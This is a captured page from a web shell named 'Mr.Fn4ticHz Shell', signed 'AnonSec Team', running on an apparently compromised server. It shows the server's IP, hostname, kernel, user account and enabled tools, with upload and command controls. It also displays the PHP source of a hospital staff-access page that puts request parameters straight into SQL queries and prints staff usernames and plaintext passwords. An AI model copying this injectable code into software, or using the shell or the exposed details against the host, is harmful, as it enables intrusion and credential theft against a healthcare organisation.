Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.221.179.220
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in//playeraccess.php
<?php
session_start();
include("dbconnection.php");

require_once('../DBManager.php');
require_once("../LoginManager.php");
require_once('../patientmanager.php');
 if(isset($_POST[statusva]))
{ 
     $narayan=LoginManager::currentUser();
$harilal=LoginManager::getUserTypeByuname("$narayan");
$entered_by=$harilal;
$sqlpatient1 = "SELECT * FROM site_users WHERE userno='$harilal'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
	    date_default_timezone_set('Asia/Kolkata');
$date = date('y-m-d h:i:s');
$finaltm=$date;
$sql ="UPDATE site_users SET status='$_POST[status]' WHERE  userno='$_GET[userno]'";
$sql2 ="INSERT INTO atten(id,userno,punch,punchsp,hsid,entered_by) values(Null,'$_GET[userno]','20$finaltm','non','$rsn[entered_by]','$entered_by')";
if($qsql = mysqli_query($con,$sql))
if($qsql = mysqli_query($con,$sql2))
		{
    echo "<script>
 window.history.go(-1)</script>";
     } 
	}
}
?>
   
                <table class="table table-bordered table-hover">
                 
                  <tr>
               <td bgcolor="1e73be"><strong><span style="color:white">Name</span></strong></td>
            <td bgcolor="1e73be"><strong><span style="color:white">Username</span></strong></td>
              <td bgcolor="1e73be"><strong><span style="color:white">Password </span></strong></td>
            <td bgcolor="1e73be"><strong><span style="color:white">Action</span></strong></td>              
        </tr>
      
                 
<?php
include("dbconnection.php");
 $narayan=LoginManager::currentUser();
$harilal=LoginManager::getUserTypeByuname("$narayan");
$sqlpatient1 = "SELECT * FROM site_users WHERE entered_by='$harilal' AND status='Active' AND usertype='Doctor' OR entered_by='$harilal' AND status='Active' AND usertype='FrontOffice' OR entered_by='$harilal' AND status='Active' AND usertype='pharma' OR entered_by='$harilal' AND status='Active' AND usertype='Nurse'  OR entered_by='$harilal' AND status='Active' AND usertype='RMO' OR entered_by='$harilal' AND status='Active' AND usertype='HR' OR entered_by='$harilal' AND status='Active' AND usertype='Account' OR entered_by='$harilal' AND status='Active' AND usertype='OT' OR entered_by='$harilal' AND status='Active' AND usertype='Lab' OR entered_by='$harilal' AND status='Active' AND usertype='Diagnostic' OR entered_by='$harilal' AND status='Active' AND usertype='Subadmin' OR entered_by='$harilal' AND status='Active' AND usertype='lab_Doctor' OR entered_by='$harilal' AND status='Active' AND usertype='lab_FrontOffice' OR entered_by='$harilal' AND status='Active' AND usertype='lab_Account' OR entered_by='$harilal' AND status='Active' AND usertype='Biomed' OR entered_by='$harilal' AND status='Active' AND usertype='Maintenance' OR entered_by='$harilal' AND status='Active' AND usertype='Security' OR entered_by='$harilal' AND status='Active' AND usertype='store' OR entered_by='$harilal' AND status='Active' AND usertype='Transport' OR entered_by='$harilal' AND status='Active' AND usertype='Cleaning' OR entered_by='$harilal' AND status='Active' AND usertype='Optometrist'  OR entered_by='$harilal' AND status='Active' AND usertype='Dietitian'  OR entered_by='$harilal' AND status='Active' AND usertype='counselor'  OR entered_by='$harilal' AND status='Active' AND usertype='Optical_Shop' OR entered_by='$harilal' AND status='Active' AND usertype='physiotherapist' OR entered_by='$harilal' AND status='Active' AND usertype='Blood_Technician' OR entered_by='$harilal' AND status='Active' AND usertype='Blood_Technician' OR entered_by='$harilal' AND status='Active' AND usertype='Supervisor-Corporate' OR entered_by='$harilal' AND status='Active' AND usertype='Supervisor-MRD'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
	    
            echo "
          
            <tr>   <td>&nbsp;$rsn[name] ($rsn[usertype])</td>
              		<td>&nbsp;$rsn[uname]</td>
              		 <td>&nbsp;$rsn[password]</td>
<td>&nbsp;<form method='post' name='statusva' action='playerset.php?userno=$rsn[userno]' >
<input type='hidden' name='status' Value='Deactivate'>
<input type='submit' name='statusva' Value='Deactivate'>
</form>
";
}
?> 


    </tr> 

        </table>

Anon7 - 2022
AnonSec Team